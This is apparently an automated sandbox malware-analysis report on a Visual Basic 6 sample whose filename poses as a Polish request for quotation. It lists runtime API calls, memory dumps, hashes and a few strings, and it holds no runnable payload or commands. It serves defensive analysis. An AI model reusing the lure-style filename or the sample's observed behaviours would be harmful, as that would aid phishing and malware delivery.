                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429E05
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Free$ErrorList$#525#537#616AnsiCopyFromOverflowPathSystemUnicode
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3494673155-0
                                                                                                                                                                                                                                                      • Opcode ID: 06e0597c0c0a64de7a739e86bbd130d0eaa357415623081fa9728b986bb3ce25
                                                                                                                                                                                                                                                      • Instruction ID: 358cedcb50fb0de278f4ad7536de046e5609ba25d4bc9f82414949036a89438a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06e0597c0c0a64de7a739e86bbd130d0eaa357415623081fa9728b986bb3ce25
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46310E71D10219AFDB04EFB5DD89DEEBBB8EF58700F10812AE506B6260DA785905CB64

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,0040BC8B), ref: 0041E89E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8CE
                                                                                                                                                                                                                                                      • #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8E0
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E8EB
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041E8FC
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041E911
                                                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(00000000), ref: 0041E91D
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041E92B
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E934
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041E949
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E954
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041E95D
                                                                                                                                                                                                                                                      • #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041E96D
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E978
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E981
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041E9B5,?,?,?,00000000,Function_000032B6), ref: 0041E9AE
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E9C9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$FreeMove$Error$#525#537#616AnsiBstrChkstkComputerNameOverflowUnicode
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3892761589-0
                                                                                                                                                                                                                                                      • Opcode ID: 315b392100c3462b08fcc4b1466ef19faf135d5fa9e097fc028cf97c92f61f1c
                                                                                                                                                                                                                                                      • Instruction ID: ddd52465c9ed4945c744d66910b811b9efcc79ef8180f597879438901a225856
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 315b392100c3462b08fcc4b1466ef19faf135d5fa9e097fc028cf97c92f61f1c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3531ECB5900149EFDB04EFA4DE4DBDEBBB8EB08701F108169E502B62A0DB755A44CB64

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041570B
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415719
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415724
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041572D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1195834276-0
                                                                                                                                                                                                                                                      • Opcode ID: bdf559da7314384f190e296f1ac055395a927108a04aa4df9cc8b86ae63a2552
                                                                                                                                                                                                                                                      • Instruction ID: 3bfd6651098160e42727f528c249f020de588879550cabcf3784d8fb116c8987
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bdf559da7314384f190e296f1ac055395a927108a04aa4df9cc8b86ae63a2552
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A0121B1D00605EFCB04EFB8D94AAEF7BB8EB44700F50466AF515E3290D73899468B95

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157BB
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157C9
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157D4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157DD
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1195834276-0
                                                                                                                                                                                                                                                      • Opcode ID: 83a8390b36b60fd734ea8c397f5819164e647e3c1d550d8bc1d44403629c9ffe
                                                                                                                                                                                                                                                      • Instruction ID: 842bb0dc7b1d712480adeb04c5aa04fa762cb34ee96fa383d986c0466198cab9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83a8390b36b60fd734ea8c397f5819164e647e3c1d550d8bc1d44403629c9ffe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 580152B1C00605DFCB00EFA8C94AAAF7BB8EB44700F50422AE511E3290D73859428B95

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 488 403670-403698 #100 489 403625-403628 __vbaRaiseEvent 488->489 490 40369a-4036d5 488->490 489->488 491 4036d8-403706 490->491 493 403708-403709 491->493 494 40375f 491->494 496 40370b-403739 493->496 497 40376e-40379c 493->497 496->491 500 40373b-403746 496->500 498 40380e-403827 497->498 499 40379e-4037a0 497->499 501 4037a2-403801 499->501 502 403807-403809 499->502 500->494 501->502 502->498
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: #100
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1341478452-0
                                                                                                                                                                                                                                                      • Opcode ID: 11ea1c51b5a51515781a12991443ec066bd5106ecc6824d3c35676c3fc523bff
                                                                                                                                                                                                                                                      • Instruction ID: 87d76072f60c1bc7f33af001724cdeb9567c685050ecb4be3524b273619080b8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11ea1c51b5a51515781a12991443ec066bd5106ecc6824d3c35676c3fc523bff
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 805185A680E7C15FC70387704D756557FB0AE23209B2E86EBC4C0DB1E3E2AD590AD766
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00416205
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00416230
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00416251
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00416271
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(0042C028), ref: 00416284
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004162D2
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00416315
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00407CCC,00000000,00000001), ref: 00416350
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00416357
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000), ref: 0041635F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00416366
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000), ref: 0041636B
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00406F58,00000000,00000001), ref: 0041639A
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$Move$System$BoundsFreeGenerateUnlock
                                                                                                                                                                                                                                                      • String ID: d/m/yy h:m$system32\drivers\$system\
                                                                                                                                                                                                                                                      • API String ID: 4109330638-2282477228
                                                                                                                                                                                                                                                      • Opcode ID: 161571ce6ef3f7305a61f0ace64fbd078412d40ef427ac6ccd469720dc9a114e
                                                                                                                                                                                                                                                      • Instruction ID: d0160703c745c1a143ef53c75ac1b7ca3f1d84f450066f924383876c7bbd0f3b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 161571ce6ef3f7305a61f0ace64fbd078412d40ef427ac6ccd469720dc9a114e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93336D71A00219DFCB14DFA4DD84AEEB7B9FF48300F10816AE50AE7265DB749985CF68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000), ref: 0042317F
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00423187
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001,?,00000000), ref: 0042318B
                                                                                                                                                                                                                                                      • __vbaRecUniToAnsi.MSVBVM60(00406E0C,?,?,00000160,00000101,?,00000000), ref: 004231B6
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 004231C9
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 004231D5
                                                                                                                                                                                                                                                      • __vbaRecAnsiToUni.MSVBVM60(00406E0C,?,?,?,00000000), ref: 004231EE
                                                                                                                                                                                                                                                      • __vbaRecUniToAnsi.MSVBVM60(00406E0C,?,?,00000160,00000100,?,00000000), ref: 00423227
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 0042323A
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00423246
                                                                                                                                                                                                                                                      • __vbaRecAnsiToUni.MSVBVM60(00406E0C,?,?,?,00000000), ref: 0042325F
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 00423270
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0042327C
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004098D4,00000278,?,00000000), ref: 004232A2
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 004232B1
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004098D4,0000011C,?,00000000), ref: 004232D1
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004098D4,00000084,?,00000000), ref: 0042331C
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004098D4,0000008C,?,00000000), ref: 00423364
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004098D4,00000154,?,00000000), ref: 00423389
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004098D4,00000050,?,00000000), ref: 004233AD
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004098D4,000000E0,?,00000000), ref: 004233E3
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,?,00000000,00000000,00000003,?,00000000), ref: 00423409
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D4,00000264,?,00000000), ref: 0042343E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 00423450
                                                                                                                                                                                                                                                      • __vbaRedim.MSVBVM60(00000180,00000004,?,00000008,00000002,00000003,00000000,?,00000000,?,00000000), ref: 00423478
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 0042348C
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 004234BF
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D4,00000284), ref: 0042354C
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?), ref: 00423574
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?), ref: 00423592
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?), ref: 004235B0
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?), ref: 004235F6
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00423600
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 00423603
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0042360D
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,00000000), ref: 00423612
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0042361C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0042361F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00423629
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,00000000), ref: 0042362E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00423638
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0042363B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00423645
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0042366C
                                                                                                                                                                                                                                                      • #537.MSVBVM60(?,?), ref: 00423695
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0042369F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 004236A2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004236AC
                                                                                                                                                                                                                                                      • #537.MSVBVM60(?,00000000), ref: 004236B7
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004236C1
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 004236C4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004236CE
                                                                                                                                                                                                                                                      • #537.MSVBVM60(?,00000000), ref: 004236D9
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004236E3
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 004236E6
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004236F0
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00423717
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00423774
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004237C7
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004237DF
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004237FF
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00423812
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00423856
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00423888
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D4,00000284), ref: 0042390C
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423950
                                                                                                                                                                                                                                                      • _adj_fdiv_m64.MSVBVM60 ref: 00423985
                                                                                                                                                                                                                                                      • __vbaR8IntI4.MSVBVM60 ref: 00423994
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004239A7
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004239CD
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(0040A0E4,00000000), ref: 004239DE
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423A15
                                                                                                                                                                                                                                                      • _adj_fdiv_m64.MSVBVM60 ref: 00423A46
                                                                                                                                                                                                                                                      • __vbaR8IntI4.MSVBVM60 ref: 00423A55
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423A68
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423A88
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00423A97
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423AC6
                                                                                                                                                                                                                                                      • _adj_fdiv_m64.MSVBVM60 ref: 00423AF7
                                                                                                                                                                                                                                                      • __vbaR8IntI4.MSVBVM60 ref: 00423B06
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423B19
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423B39
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423B6A
                                                                                                                                                                                                                                                      • _adj_fdiv_m64.MSVBVM60 ref: 00423B9F
                                                                                                                                                                                                                                                      • __vbaR8IntI4.MSVBVM60 ref: 00423BAE
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423BC5
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423BF8
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423C40
                                                                                                                                                                                                                                                      • _adj_fdiv_m64.MSVBVM60 ref: 00423C75
                                                                                                                                                                                                                                                      • __vbaR8IntI4.MSVBVM60 ref: 00423C84
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423C97
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423CBD
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(0040A0E4,00000000), ref: 00423CCE
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423D05
                                                                                                                                                                                                                                                      • _adj_fdiv_m64.MSVBVM60 ref: 00423D36
                                                                                                                                                                                                                                                      • __vbaR8IntI4.MSVBVM60 ref: 00423D45
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423D58
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423D78
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00423D87
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423DB6
                                                                                                                                                                                                                                                      • _adj_fdiv_m64.MSVBVM60 ref: 00423DE7
                                                                                                                                                                                                                                                      • __vbaR8IntI4.MSVBVM60 ref: 00423DF6
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423E09
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423E29
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423E5A
                                                                                                                                                                                                                                                      • _adj_fdiv_m64.MSVBVM60 ref: 00423E8F
                                                                                                                                                                                                                                                      • __vbaR8IntI4.MSVBVM60 ref: 00423E9E
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423EB5
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423ED3
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(0040886C,00000000), ref: 00423EF0
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00423EFA
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00423F06
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00423F12
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00423F6A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423FB9
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423FD1
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00423FED
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(0040A0E4,00000000), ref: 00424002
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00424035
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0042404D
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00424069
                                                                                                                                                                                                                                                      • #537.MSVBVM60(?,?), ref: 00424089
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?), ref: 00424097
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 0042409A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?), ref: 004240A4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?), ref: 004240AC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,?), ref: 00424100
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0042410A
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000), ref: 0042410E
                                                                                                                                                                                                                                                      • _adj_fdiv_m64.MSVBVM60(00000008,?), ref: 00424187
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(?,00000008,?), ref: 004241B2
                                                                                                                                                                                                                                                      • __vbaFpI4.MSVBVM60(?,00000008,?), ref: 004241E0
                                                                                                                                                                                                                                                      • #606.MSVBVM60(00000000,?,00000008,?), ref: 004241ED
